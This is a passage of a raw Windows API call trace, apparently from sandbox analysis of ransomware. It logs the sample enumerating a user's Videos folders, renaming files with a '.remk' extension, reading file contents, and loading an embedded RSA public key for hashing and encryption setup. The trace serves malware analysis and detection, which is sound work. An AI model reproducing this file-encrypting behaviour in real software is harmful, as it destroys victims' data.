lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0236.846] WriteFile (in: hFile=0x640, lpBuffer=0x31c0f10*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x3adfb50, lpOverlapped=0x0 | out: lpBuffer=0x31c0f10*, lpNumberOfBytesWritten=0x3adfb50*=0x100, lpOverlapped=0x0) returned 1 [0236.847] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0236.847] WriteFile (in: hFile=0x640, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x3adfb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x3adfb50*=0x26, lpOverlapped=0x0) returned 1 [0236.847] CloseHandle (hObject=0x640) returned 1 [0236.850] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xb0) returned 0x3186340 [0236.850] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8c0) returned 0x37bd408 [0236.851] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\PCPKs0u\\CSFg h-wcbKcac\\xB0W_x\\LJecWOah9kPE.mp4" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\pcpks0u\\csfg h-wcbkcac\\xb0w_x\\ljecwoah9kpe.mp4"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\PCPKs0u\\CSFg h-wcbKcac\\xB0W_x\\LJecWOah9kPE.mp4.remk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\pcpks0u\\csfg h-wcbkcac\\xb0w_x\\ljecwoah9kpe.mp4.remk")) returned 1 [0236.852] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x2e290100, ftCreationTime.dwHighDateTime=0x1d5e0d6, ftLastAccessTime.dwLowDateTime=0x3e4ffa10, ftLastAccessTime.dwHighDateTime=0x1d5d9e3, ftLastWriteTime.dwLowDateTime=0x3e4ffa10, ftLastWriteTime.dwHighDateTime=0x1d5d9e3, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="TNlwUISWdF VQwLUr", cAlternateFileName="TNLWUI~1")) returned 1 [0236.853] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xb0) returned 0x3186340 [0236.853] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xb0) returned 0x3186288 [0236.853] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xb0) returned 0x3185e38 [0236.853] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x2e290100, ftCreationTime.dwHighDateTime=0x1d5e0d6, ftLastAccessTime.dwLowDateTime=0x3e4ffa10, ftLastAccessTime.dwHighDateTime=0x1d5d9e3, ftLastWriteTime.dwLowDateTime=0x3e4ffa10, ftLastWriteTime.dwHighDateTime=0x1d5d9e3, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="TNlwUISWdF VQwLUr", cAlternateFileName="TNLWUI~1")) returned 0 [0236.853] FindClose (in: hFindFile=0x31de130 | out: hFindFile=0x31de130) returned 1 [0236.853] PeekMessageW (in: lpMsg=0x3adff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x3adff08) returned 0 [0236.853] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xa0) returned 0x37b6420 [0236.853] PeekMessageW (in: lpMsg=0x3adfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x3adfb74) returned 0 [0236.853] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xa0) returned 0x37b6768 [0236.853] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0236.853] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\PCPKs0u\\CSFg h-wcbKcac\\Xq9EY6lNcW89ESh\\") returned="Xq9EY6lNcW89ESh\\" [0236.853] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x31a8a20 [0236.854] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x80) returned 0x694f48 [0236.854] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\PCPKs0u\\CSFg h-wcbKcac\\") returned="CSFg h-wcbKcac\\" [0236.854] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x711a38 [0236.854] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\PCPKs0u\\") returned="PCPKs0u\\" [0236.854] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x50) returned 0x31b5808 [0236.854] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\") returned="Videos\\" [0236.854] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x37cefd0 [0236.854] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0236.854] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed738 [0236.854] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0236.854] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0236.854] PathFindFileNameW (pszPath="") returned="" [0236.854] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xa0) returned 0x37b6768 [0236.854] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\PCPKs0u\\CSFg h-wcbKcac\\Xq9EY6lNcW89ESh\\*", lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xb9b7c1e0, ftCreationTime.dwHighDateTime=0x1d5d9ea, ftLastAccessTime.dwLowDateTime=0x45e53620, ftLastAccessTime.dwHighDateTime=0x1d5e1d9, ftLastWriteTime.dwLowDateTime=0x45e53620, ftLastWriteTime.dwHighDateTime=0x1d5e1d9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x31de130 [0236.855] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xb9b7c1e0, ftCreationTime.dwHighDateTime=0x1d5d9ea, ftLastAccessTime.dwLowDateTime=0x45e53620, ftLastAccessTime.dwHighDateTime=0x1d5e1d9, ftLastWriteTime.dwLowDateTime=0x45e53620, ftLastWriteTime.dwHighDateTime=0x1d5e1d9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0236.855] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6524e090, ftCreationTime.dwHighDateTime=0x1d5e7ff, ftLastAccessTime.dwLowDateTime=0xf5a56600, ftLastAccessTime.dwHighDateTime=0x1d5e16d, ftLastWriteTime.dwLowDateTime=0xf5a56600, ftLastWriteTime.dwHighDateTime=0x1d5e16d, nFileSizeHigh=0x0, nFileSizeLow=0x15235, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="WuazV8l9ZPKR2hR.flv", cAlternateFileName="WUAZV8~1.FLV")) returned 1 [0236.855] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xa0) returned 0x37b6768 [0236.855] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xee) returned 0x31a4298 [0236.855] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\PCPKs0u\\CSFg h-wcbKcac\\Xq9EY6lNcW89ESh\\WuazV8l9ZPKR2hR.flv") returned=".flv" [0236.855] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\PCPKs0u\\CSFg h-wcbKcac\\Xq9EY6lNcW89ESh\\WuazV8l9ZPKR2hR.flv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\pcpks0u\\csfg h-wcbkcac\\xq9ey6lncw89esh\\wuazv8l9zpkr2hr.flv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x640 [0236.856] GetFileSizeEx (in: hFile=0x640, lpFileSize=0x3adfb40 | out: lpFileSize=0x3adfb40*=86581) returned 1 [0236.856] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3c20000 [0236.859] SetFilePointerEx (in: hFile=0x640, liDistanceToMove=0x1520f, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0236.859] ReadFile (in: hFile=0x640, lpBuffer=0x3c20000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x3adfb78, lpOverlapped=0x0 | out: lpBuffer=0x3c20000*, lpNumberOfBytesRead=0x3adfb78*=0x26, lpOverlapped=0x0) returned 1 [0236.861] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x31a8a58 [0236.861] ReadFile (in: hFile=0x640, lpBuffer=0x3c20000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x3adfb70, lpOverlapped=0x0 | out: lpBuffer=0x3c20000*, lpNumberOfBytesRead=0x3adfb70*=0x15235, lpOverlapped=0x0) returned 1 [0236.862] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0236.862] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f6) returned 0x31c0d08 [0236.862] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0236.862] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0236.862] CryptAcquireContextW (in: phProv=0x3adfa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x3adfa50*=0x694f48) returned 1 [0236.864] CryptCreateHash (in: hProv=0x694f48, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x3adfa58 | out: phHash=0x3adfa58) returned 1 [0236.864] CryptHashData (hHash=0x31de170, pbData=0x31c0d08, dwDataLen=0x1f6, dwFlags=0x0) returned 1 [0236.864] CryptGetHashParam (in: hHash=0x31de170, dwParam=0x2, pbData=0x0, pdwDataLen=0x3adfa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x3adfa54) returned 1 [0236.864] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x11) returned 0x31a0f08 [0236.864] CryptGetHashParam (in: hHash=0x31de170, dwParam=0x2, pbData=0x31a0f08, pdwDataLen=0x3adfa54, dwFlags=0x0 | out: pbData=0x31a0f08, pdwDataLen=0x3adfa54) returned 1 [0236.864] GetLastError () returned 0x0 [0236.864] CryptDestroyHash (hHash=0x31de170) returned 1 [0236.864] CryptReleaseContext (hProv=0x694f48, dwFlags=0x0) returned 1 [0236.864] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31c0d08 | out: hHeap=0x630000) returned 1 [0236.864] UuidCreate (in: Uuid=0x3adfa48 | out: Uuid=0x3adfa48) returned 0x0 [0236.864] UuidToStringA (in: Uuid=0x3adfa48, StringUuid=0x3adfa40 | out: StringUuid=0x3adfa40) returned 0x0 [0236.864] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x31a8a90 [0236.864] RpcStringFreeA (in: String=0x3adfa40 | out: String=0x3adfa40) returned 0x0 [0236.864] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a8a58 | out: hHeap=0x630000) returned 1 [0236.864] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x31a8a58 [0236.865] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x15240) returned 0x37cf820 [0236.865] SetFilePointer (in: hFile=0x640, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0236.865] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a8a90 | out: hHeap=0x630000) returned 1 [0236.865] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x200) returned 0x31c0d08 [0236.865] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x31a8a90 [0236.865] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x200) returned 0x325fb40 [0236.865] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x58) returned 0x31d6930 [0236.866] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x37cefd0 [0236.866] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x37bc8a0 [0236.866] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x37cf018 [0236.866] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x37bc8b8 [0236.866] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x37bc8e8 [0236.866] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x37bc948 [0236.866] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x37bc900 [0236.866] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x24) returned 0x31ec670 [0236.866] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x158) returned 0x31f7b30 [0236.866] RtlReAllocateHeap (Heap=0x630000, Flags=0x0, Ptr=0x31f7b30, Size=0x218) returned 0x37b1db0 [0236.866] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x558) returned 0x37b5b70 [0236.866] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bc8e8 | out: hHeap=0x630000) returned 1 [0236.866] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bc900 | out: hHeap=0x630000) returned 1 [0236.866] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bc948 | out: hHeap=0x630000) returned 1 [0236.866] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ec670 | out: hHeap=0x630000) returned 1 [0236.866] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b5b70 | out: hHeap=0x630000) returned 1 [0236.866] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x37bc948 [0236.866] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x72feb0 [0236.866] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x37bc900 [0236.866] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x18) returned 0x31a0ee8 [0236.867] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x9) returned 0x37bc8e8 [0236.867] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x72fea0 [0236.867] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10e) returned 0x31c0f10 [0236.867] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed738 [0236.867] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x58) returned 0x31d6990 [0236.867] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x31a0f08 [0236.867] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x104) returned 0x31f6b30 [0236.867] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x31a0f28 [0236.867] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72fec0 [0236.867] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31c0f10 | out: hHeap=0x630000) returned 1 [0236.867] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bc900 | out: hHeap=0x630000) returned 1 [0236.867] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72fea0 | out: hHeap=0x630000) returned 1 [0236.867] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bc8e8 | out: hHeap=0x630000) returned 1 [0236.867] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a0ee8 | out: hHeap=0x630000) returned 1 [0236.867] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72feb0 | out: hHeap=0x630000) returned 1 [0236.867] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bc948 | out: hHeap=0x630000) returned 1 [0236.867] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed738 | out: hHeap=0x630000) returned 1 [0236.867] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31d6930 | out: hHeap=0x630000) returned 1 [0236.867] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b1db0 | out: hHeap=0x630000) returned 1 [0236.867] GetCurrentThreadId () returned 0x314 [0236.867] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x31c0f10 [0236.868] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x82) returned 0x37c6440 [0236.868] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x2c) returned 0x31a8ac8 [0236.868] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x80) returned 0x694f48 [0236.868] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x148) returned 0x37bddc8 [0236.868] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72feb0 [0236.868] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72fea0 [0236.868] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x3192918 [0236.868] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0236.868] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0236.868] GetCurrentThreadId () returned 0x314 [0236.868] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0236.868] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0236.868] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xeb) returned 0x65dd10 [0236.868] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0236.868] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0236.868] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0236.868] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0236.868] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x65dd10 | out: hHeap=0x630000) returned 1 [0236.868] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x65dd10 [0236.868] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72feb0 | out: hHeap=0x630000) returned 1 [0236.868] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4c) returned 0x31b5808 [0236.869] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72feb0 [0236.869] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x3195950 [0236.869] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72fee0 [0236.869] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x37bc948 [0236.869] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72fee0 | out: hHeap=0x630000) returned 1 [0236.869] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72fee0 [0236.869] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72ff00 [0236.869] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x68ed18 [0236.869] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x68ed28 [0236.869] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x325f758 [0236.869] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x325f768 [0236.869] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x325f778 [0236.869] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x37bc8e8 [0236.869] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72ff00 | out: hHeap=0x630000) returned 1 [0236.869] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x72ff00 [0236.869] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72fee0 | out: hHeap=0x630000) returned 1 [0236.869] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72fee0 [0236.869] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x325f788 [0236.869] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x325f798 [0236.869] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x325f7a8 [0236.870] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x37bc900 [0236.870] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325f798 | out: hHeap=0x630000) returned 1 [0236.870] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x31a0ee8 [0236.870] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325f788 | out: hHeap=0x630000) returned 1 [0236.870] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x37bc8d0 [0236.870] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325f7a8 | out: hHeap=0x630000) returned 1 [0236.870] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x37bc960 [0236.870] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72fee0 | out: hHeap=0x630000) returned 1 [0236.870] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x72fee0 [0236.870] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325f768 | out: hHeap=0x630000) returned 1 [0236.870] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x37bc930 [0236.870] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72fee0 | out: hHeap=0x630000) returned 1 [0236.870] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x37bc918 [0236.870] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x68ed18 | out: hHeap=0x630000) returned 1 [0236.870] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x37bc978 [0236.870] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bc918 | out: hHeap=0x630000) returned 1 [0236.870] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x37bc918 [0236.870] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bc930 | out: hHeap=0x630000) returned 1 [0236.870] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x68ed18 [0236.870] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72feb0 | out: hHeap=0x630000) returned 1 [0236.870] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x31a0ea8 [0236.871] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x68ed18 | out: hHeap=0x630000) returned 1 [0236.871] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x18) returned 0x31a0ec8 [0236.871] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bc8e8 | out: hHeap=0x630000) returned 1 [0236.871] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x37bc8e8 [0236.871] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72ff00 | out: hHeap=0x630000) returned 1 [0236.871] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x204) returned 0x325fd48 [0236.871] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bc948 | out: hHeap=0x630000) returned 1 [0236.871] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x108) returned 0x31f6c48 [0236.871] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bc978 | out: hHeap=0x630000) returned 1 [0236.871] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x210) returned 0x37b5b70 [0236.871] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a0ec8 | out: hHeap=0x630000) returned 1 [0236.871] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10c) returned 0x72aea0 [0236.871] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x68ed28 | out: hHeap=0x630000) returned 1 [0236.871] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x108) returned 0x31f6e78 [0236.871] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bc8e8 | out: hHeap=0x630000) returned 1 [0236.871] 